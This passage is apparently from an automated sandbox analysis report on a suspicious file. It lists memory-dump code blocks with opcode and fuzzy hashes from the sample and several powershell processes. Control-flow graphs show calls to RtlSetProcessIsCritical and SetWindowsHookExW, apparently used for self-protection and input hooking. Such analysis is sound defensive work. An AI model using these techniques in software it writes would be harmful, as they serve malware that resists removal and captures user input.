                                                                                  • Instruction Fuzzy Hash: C032B361B2CA4A4FEBA8EB6C84A527D77D2FF9D310F44057AE04ED32C6DD28AC419741
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3426952229.00007FFD34810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34810000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd34810000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a82fade97364c555b18b3f3731b554b86105fa6e5ef111f567ae31ce0eb95b35
                                                                                  • Instruction ID: 3e108403f1fda83eaa3af9a20040e981d8a1f42e90e702633cf4860e0b9eb348
                                                                                  • Opcode Fuzzy Hash: a82fade97364c555b18b3f3731b554b86105fa6e5ef111f567ae31ce0eb95b35
                                                                                  • Instruction Fuzzy Hash: 6422C361B1CA494FEBA8EB6C84B56B977D2EF99310F4405BAE04EC32D2DD28AC41D741
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3426952229.00007FFD34810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34810000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd34810000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 44672f644ca5eaeae13a72a4023b9d92019c11b9e63a022cca2c227699991120
                                                                                  • Instruction ID: d7a82a5c8c6381aee8e0882e3042f37738fa1cf88348009d4ad3433e668abd6c
                                                                                  • Opcode Fuzzy Hash: 44672f644ca5eaeae13a72a4023b9d92019c11b9e63a022cca2c227699991120
                                                                                  • Instruction Fuzzy Hash: 4E42D534E085198EEB69EB64C4A57F9B3B1FF49301F1045BAD10EE3292DF396981DB50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3426952229.00007FFD34810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34810000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd34810000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d688570d0421ec60f9786b4250ed403244a31b22560a4ad1fa0a9c525c4c2ca2
                                                                                  • Instruction ID: f9af913f62708430cf2f8d2c0dac342c5de81a1acb2da63993618d3b3ff2033c
                                                                                  • Opcode Fuzzy Hash: d688570d0421ec60f9786b4250ed403244a31b22560a4ad1fa0a9c525c4c2ca2
                                                                                  • Instruction Fuzzy Hash: C8F19630A08A8D8FEBA8DF28C8557E937E1FF55310F04426EE84DD7295DB78A945CB81
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3426952229.00007FFD34810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34810000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd34810000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 4a5e64a1206692f5cba44bc15bde58f3a9e19f5d53cc4f48ff75cc5fe74aa650
                                                                                  • Instruction ID: 75b056c0f350c385b79605347b87d58f6e2b5f13a056bd627a547deb3e20c228
                                                                                  • Opcode Fuzzy Hash: 4a5e64a1206692f5cba44bc15bde58f3a9e19f5d53cc4f48ff75cc5fe74aa650
                                                                                  • Instruction Fuzzy Hash: B2E18430A08A8E8FEBA8DF28C8557E977D1FB55310F14426ED84DC7291DE78A945CB81
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3426952229.00007FFD34810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34810000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd34810000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ae3c9be2d3a50b47f97e3a435d86a6f783ce82c87700a2adeec487bad6bb54c4
                                                                                  • Instruction ID: 455158cf672f4a57780341980abca5a331181078c241012a36e72c3631886e28
                                                                                  • Opcode Fuzzy Hash: ae3c9be2d3a50b47f97e3a435d86a6f783ce82c87700a2adeec487bad6bb54c4
                                                                                  • Instruction Fuzzy Hash: 9951211071E6C90FE796ABB858742767FE5DF87225B1801FBE08DD7193DD181806C342
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3426952229.00007FFD34810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34810000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd34810000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 405ae6b7fc718bc804bfe9428a7b964c1a14183177d18b667d311d5ee22a0411
                                                                                  • Instruction ID: 8c496c253724e92c046d50f07661bc737f6b384c817e4e5e56a865a85bb02830
                                                                                  • Opcode Fuzzy Hash: 405ae6b7fc718bc804bfe9428a7b964c1a14183177d18b667d311d5ee22a0411
                                                                                  • Instruction Fuzzy Hash: 8751A770A18A1D8FDB98EF68D4A5AACB7F1FF59301F104169D01EE7292CF35A881DB40

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 368 7ffd3481b10d-7ffd3481b1f0 RtlSetProcessIsCritical 371 7ffd3481b1f2 368->371 372 7ffd3481b1f8-7ffd3481b22d 368->372 371->372
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3426952229.00007FFD34810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34810000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd34810000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalProcess
                                                                                  • String ID:
                                                                                  • API String ID: 2695349919-0
                                                                                  • Opcode ID: a0bcdd57146e1e077e1b556baa11c3153b881b2a73aa8d1b0f7db6b646d7586d
                                                                                  • Instruction ID: 46089f4745a293fbd17dbd80b8ebede481b29089891ae6b55ba450f1e2f5d9c3
                                                                                  • Opcode Fuzzy Hash: a0bcdd57146e1e077e1b556baa11c3153b881b2a73aa8d1b0f7db6b646d7586d
                                                                                  • Instruction Fuzzy Hash: AA41233190C6588FD718DF98D845BEABBF0FF56311F04416EE08AC3692CB74A846CB91

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 374 7ffd3481b658-7ffd3481b65f 375 7ffd3481b661-7ffd3481b669 374->375 376 7ffd3481b66a-7ffd3481b6dd 374->376 375->376 380 7ffd3481b6e3-7ffd3481b6f0 376->380 381 7ffd3481b769-7ffd3481b76d 376->381 382 7ffd3481b6f2-7ffd3481b72f SetWindowsHookExW 380->382 381->382 383 7ffd3481b731 382->383 384 7ffd3481b737-7ffd3481b768 382->384 383->384
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3426952229.00007FFD34810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34810000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd34810000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: HookWindows
                                                                                  • String ID:
                                                                                  • API String ID: 2559412058-0
                                                                                  • Opcode ID: 0419290c483cd7d939c9717c23008cdab2e01e4781b5d8abdd54193ce19b72ab
                                                                                  • Instruction ID: 42ed18ebf3ff73320a51eddd7f0cd7fc7b5ddda45f982e09d7abda4a4ceb6103
                                                                                  • Opcode Fuzzy Hash: 0419290c483cd7d939c9717c23008cdab2e01e4781b5d8abdd54193ce19b72ab
                                                                                  • Instruction Fuzzy Hash: 68410831A1CA5D4FDB18DB6C98566F9BBE1EB69321F00427FE049D3292CA64A852C7C1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3426952229.00007FFD34810000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34810000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_7ffd34810000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 12524d5394a811daccacad51970dd13a0c63a1d4fa0e9a7d7f5832399fdabd23
                                                                                  • Instruction ID: 871de59a57886f6cddfd0f30ce308db281b3fa2a4cb3dd53a2a34268668f9c69
                                                                                  • Opcode Fuzzy Hash: 12524d5394a811daccacad51970dd13a0c63a1d4fa0e9a7d7f5832399fdabd23
                                                                                  • Instruction Fuzzy Hash: D351C217B0E9765AE73277F9B8A55EE7B14DF42371B0842B7D14C9A0838D082489C7D5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2226235042.00007FFD34800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34800000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ffd34800000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d6a777e7a1dd3d88e1aebddeaa2e33d2eb77ecbb96ed7a5115dd789479f5e366
                                                                                  • Instruction ID: bb10e3fd5b2ab5269110c0aeaf2e8e6c90ee0af0e6bf52508e1d5ea6986bb546
                                                                                  • Opcode Fuzzy Hash: d6a777e7a1dd3d88e1aebddeaa2e33d2eb77ecbb96ed7a5115dd789479f5e366
                                                                                  • Instruction Fuzzy Hash: 89810067B1D9895BF722AB6C98F70EA37D4DF13325B4802B2C948CE093FD1D18579641
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2226608515.00007FFD348D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ffd348d0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: X72^
                                                                                  • API String ID: 0-1870275526
                                                                                  • Opcode ID: 3ae831a1313d9a572183be71aad8a5741d5d9c2d496c783631239a0bd27b8d5d
                                                                                  • Instruction ID: 20a79516a7513b85afe316ae8076a4648b1da270903caffb1760f912ca48bbfb
                                                                                  • Opcode Fuzzy Hash: 3ae831a1313d9a572183be71aad8a5741d5d9c2d496c783631239a0bd27b8d5d
                                                                                  • Instruction Fuzzy Hash: CAD11632A0FA8D4FEBA5EF6858A55B57BE1EF57310B0802BED54DD70A3DA1CA805C341
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2226235042.00007FFD34800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34800000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ffd34800000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b88fa319b68bb9eba1ecf88f3885691e007ecd62a69ae96ef4d35df256435836
                                                                                  • Instruction ID: 22b4e57e9229856d74091850fa24d7dc9c4905c55d27ad21815b4572b9737aa3
                                                                                  • Opcode Fuzzy Hash: b88fa319b68bb9eba1ecf88f3885691e007ecd62a69ae96ef4d35df256435836
                                                                                  • Instruction Fuzzy Hash: E0412772A1CB485FDB589F5C98966F97BE0FF95311F40412FE449C3292DB25A806CBC2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2225831045.00007FFD346ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346ED000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ffd346ed000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d3de1977500f5134d127149c81ff3170875583d39b39c4d2f253f14e24f7ee8c
                                                                                  • Instruction ID: a2f996bc03c03aad8b756d7a328b6c3a3a8daf0c2bb8591fcf4def81f27a8d72
                                                                                  • Opcode Fuzzy Hash: d3de1977500f5134d127149c81ff3170875583d39b39c4d2f253f14e24f7ee8c
                                                                                  • Instruction Fuzzy Hash: 9E41D37190DBC44FE7568F28D8959A63FF0EF53324B1905EFD088CB1A3D629A846C792
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2226235042.00007FFD34800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34800000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ffd34800000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3d5beb88d582fe357f6f26e7fabf5984305a78b6e799c6ec6efde2aced8bae57
                                                                                  • Instruction ID: 64ee419af071f3169e0d633d8949cd0ac113cd1bd1b7da37a83e61416ecc2e4d
                                                                                  • Opcode Fuzzy Hash: 3d5beb88d582fe357f6f26e7fabf5984305a78b6e799c6ec6efde2aced8bae57
                                                                                  • Instruction Fuzzy Hash: 9621FB3190CB4C4FDB59DF9C988A7E97BE0EFA6321F04416BD049C3152DA74945ACB91
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2226235042.00007FFD34800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34800000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ffd34800000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                  • Instruction ID: ee10ff1c4a4bc8693cad707e4683dde159bb38e644a1751304e2bda521ebd88d
                                                                                  • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                                  • Instruction Fuzzy Hash: 3801677121CB0C4FD744EF0CE491AA6B7E0FB95364F10056DE58AC3655DA36E882CB45
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2226608515.00007FFD348D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ffd348d0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: cd6110cfbe50656e84ff76e70b277e360336a2b4e321edce097364a8e7931bd3
                                                                                  • Instruction ID: a0d38defd636366f1444821ef71b84fcd07256131c818be2d8a679d1a3948ccd
                                                                                  • Opcode Fuzzy Hash: cd6110cfbe50656e84ff76e70b277e360336a2b4e321edce097364a8e7931bd3
                                                                                  • Instruction Fuzzy Hash: E6F0BE32B0EA048FDB68EB4CE4904A8B3F0EF5A320B1500BAE15DC7163CA2AEC40C740
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2226608515.00007FFD348D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ffd348d0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3144911cc94bf35522688d59fc51ff9de21d45b62c33701fb0689716fe6bad20
                                                                                  • Instruction ID: 1cea30166ac7c3ff8ea135978f8ab7dce45c55b714242a06cb367b969fff99e2
                                                                                  • Opcode Fuzzy Hash: 3144911cc94bf35522688d59fc51ff9de21d45b62c33701fb0689716fe6bad20
                                                                                  • Instruction Fuzzy Hash: D7F0BE32A4F5448FDB54EB4CE0948A8B3E0FF0632474100B6E14DCB063DA2AAC80C740
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2226608515.00007FFD348D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ffd348d0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                  • Instruction ID: fef8a597badc8d47bf1ed5b600dc0c892f0a73fff92204a899e8d578ed342c89
                                                                                  • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                  • Instruction Fuzzy Hash: C8E04F31B0D8189FDA68DB0CE0909E9B3E1EF9E331B1102B7D24EC7561CA26EC51DB80
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.2226235042.00007FFD34800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34800000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_7ffd34800000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: M_^4$M_^7$M_^F$M_^J
                                                                                  • API String ID: 0-622050427
                                                                                  • Opcode ID: 0952385b8bdb8dc4856a798c81327935ad6e11df2551058c8feb274a0171bac6
                                                                                  • Instruction ID: aa8ee28e823be06e0a9b00e8ebcb7becbcc6c7811fb0ab8f80e6bd92b873606f
                                                                                  • Opcode Fuzzy Hash: 0952385b8bdb8dc4856a798c81327935ad6e11df2551058c8feb274a0171bac6
                                                                                  • Instruction Fuzzy Hash: 732104B7708865AEE3227BBDB8149EE3744CF9423478507B2E19CDB083F91864C68AC0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2378048720.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd348c0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8c45b002eb79a94e5eadc05794dbd042de9968a7d811f45496f4f6bb97361cb4
                                                                                  • Instruction ID: 4f61130744aa58bd16d7438a426a2bd617687c07d52065023e83a35b81fdfcae
                                                                                  • Opcode Fuzzy Hash: 8c45b002eb79a94e5eadc05794dbd042de9968a7d811f45496f4f6bb97361cb4
                                                                                  • Instruction Fuzzy Hash: EFD12772A0EA894FEBA5AB6848B56B5BBD0EF56314F0801FFD54DD70A3DA18AC05C341
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2378048720.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd348c0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8f7769a7f9546574f25eb764180c8fe2c1a7c213d7f7e8bb6e38816cf3400a9c
                                                                                  • Instruction ID: ecf7288262dcfbf626a31062163c01f54c53c63289b636e8e17b9ff6b8d84384
                                                                                  • Opcode Fuzzy Hash: 8f7769a7f9546574f25eb764180c8fe2c1a7c213d7f7e8bb6e38816cf3400a9c
                                                                                  • Instruction Fuzzy Hash: A1512723B0DA960FE7A9DB1C55A1274B7D1EF96620B1801BBC28FC7193DD18EC858341
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2378048720.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd348c0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 438fb6f2ba3b17511c7508b4d317d7f2f458e464afc21c62b9bad5affde5ff0f
                                                                                  • Instruction ID: ff84eec87d5a309b7eda4d5831b1165ebc1662add9221afdc9bb21ac46d57a31
                                                                                  • Opcode Fuzzy Hash: 438fb6f2ba3b17511c7508b4d317d7f2f458e464afc21c62b9bad5affde5ff0f
                                                                                  • Instruction Fuzzy Hash: 69412832B0DA494FEBA5D76C94A16B8B7D1EF86720B1801FBD54EC7183E91DAC45C381
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2376210069.00007FFD346DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD346DD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd346dd000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 0758dd534d05270eb1bb8e5b18750e67a79765f377bde0b727960c7b1e141ded
                                                                                  • Instruction ID: 983eea10e57c7a00d759804cf1390248b494b4e2ffc786bf6a1f4de8ff1c678e
                                                                                  • Opcode Fuzzy Hash: 0758dd534d05270eb1bb8e5b18750e67a79765f377bde0b727960c7b1e141ded
                                                                                  • Instruction Fuzzy Hash: 9141267140EFC45FE7568B29D8959923FF0EF53320B1905DFD088CB1A3D629A846C7A2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2377059405.00007FFD347F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd347f0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 57947e4ffef9ffb3aafe16107bb0f62a8c8c9482eb3b39a8cfde40475b587151
                                                                                  • Instruction ID: 7557695ba5df15696ed13b8f3380de628679aaa5bdc7eb7d5c46d3337de24856
                                                                                  • Opcode Fuzzy Hash: 57947e4ffef9ffb3aafe16107bb0f62a8c8c9482eb3b39a8cfde40475b587151
                                                                                  • Instruction Fuzzy Hash: B021067190CB4C8FDB59DBAC984A7E97BE0EB96321F04416BD048C3152D674A816CB91
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2378048720.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd348c0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: bffc7bc66bba7c5109c4534e619d0ac6f47397883c3c0af87bd4bc773cc91b4d
                                                                                  • Instruction ID: c94f20c7b8db7c0b28599f75404265bd7081f3b43233d0027913004765a1a224
                                                                                  • Opcode Fuzzy Hash: bffc7bc66bba7c5109c4534e619d0ac6f47397883c3c0af87bd4bc773cc91b4d
                                                                                  • Instruction Fuzzy Hash: FA21F223B0DA964FE7A5DB1886B1174A6D1EF66620B5901BBD28FC71A3CD1CEC849341
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2378048720.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd348c0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 861266204abe62fc4c5b7cdfa142483b3d27fc43fdc808c3cb68914a903d99ed
                                                                                  • Instruction ID: cf92a71125785833276f19a70027954ae6920b06ebb08534083e80ad7a7aa0b6
                                                                                  • Opcode Fuzzy Hash: 861266204abe62fc4c5b7cdfa142483b3d27fc43fdc808c3cb68914a903d99ed
                                                                                  • Instruction Fuzzy Hash: 35110232B0E9854FE7A4D72C94B49B8BBD0EF86624B5900FBD55EC7092D91DAC809380
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2377059405.00007FFD347F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd347f0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                  • Instruction ID: 94816e60607fb0e10e755f000ba51ea1898e434ab0ee721be112b1c0a607d8d1
                                                                                  • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                  • Instruction Fuzzy Hash: 1701677121CB0C8FD744EF0CE451AA5B7E0FF95364F10056DE58AC3655DA36E882CB45
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2377059405.00007FFD347F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd347f0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: bd94538554431c24d5f81ec9d91b81a84b93d75f6278bcf8e8e548cc84793be7
                                                                                  • Instruction ID: b4d1515d4873b84dc1764d0cd7e177b144b1f450dd130e49278416f3c945749b
                                                                                  • Opcode Fuzzy Hash: bd94538554431c24d5f81ec9d91b81a84b93d75f6278bcf8e8e548cc84793be7
                                                                                  • Instruction Fuzzy Hash: 94F028B7A08A8C8FEB51DB2CA8650D57BF0FF62311B060077D648C7051DA29A848CBC2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000006.00000002.2377059405.00007FFD347F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_6_2_7ffd347f0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: N_^4$N_^5$N_^@$N_^N$N_^U$N_^Y
                                                                                  • API String ID: 0-3838031992
                                                                                  • Opcode ID: 000928370a00c9072ab529e96a177d9eec600aa8f3397a0338d5bfbb659d5243
                                                                                  • Instruction ID: 60e27d0a2f92c18c58e328fd64b58ca976c6979b2f0ea8296cecfa14812cd21c
                                                                                  • Opcode Fuzzy Hash: 000928370a00c9072ab529e96a177d9eec600aa8f3397a0338d5bfbb659d5243
                                                                                  • Instruction Fuzzy Hash: 3931D0A7B089265AD32276FCBCA12ED6748DF9437634502B7D39CCB143D92864CB87C2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.2573146625.00007FFD348F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_7ffd348f0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: X77=
                                                                                  • API String ID: 0-3333875553
                                                                                  • Opcode ID: e296868b53ace158cf7409bdd264d126fa86fb39661ed3dcd5dcaa08364181fd
                                                                                  • Instruction ID: 90946cd1b8aec490ecb7a46f49d89efdc0228918b3a3895863ab35e9e62657e4
                                                                                  • Opcode Fuzzy Hash: e296868b53ace158cf7409bdd264d126fa86fb39661ed3dcd5dcaa08364181fd
                                                                                  • Instruction Fuzzy Hash: 03C15833B1DA8A4FEBA5AF6858A55B97BD0EF16310B4402BED54CD70A3DA1CAC06D341
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.2572207510.00007FFD34820000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34820000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_7ffd34820000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ddaeb38d14cab3bb89be7b5f573f1b933cbd32bf894cfe3aac3d8a78e8223379
                                                                                  • Instruction ID: 45f0ec35c0980d53f49a7cdd5cb3dafd8a4c96198db217e3190284770df7cfd7
                                                                                  • Opcode Fuzzy Hash: ddaeb38d14cab3bb89be7b5f573f1b933cbd32bf894cfe3aac3d8a78e8223379
                                                                                  • Instruction Fuzzy Hash: 28C18331A18A4D8FDF95DF5CC4A5AAD7BF1FF59340F1441AAD409E7296CA38E881CB80
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000A.00000002.2573146625.00007FFD348F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_10_2_7ffd348f0000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: fab01cc8ff90c9b746ac1988f9cae6db938ec13d97cf44739b51f4a8a13e5171
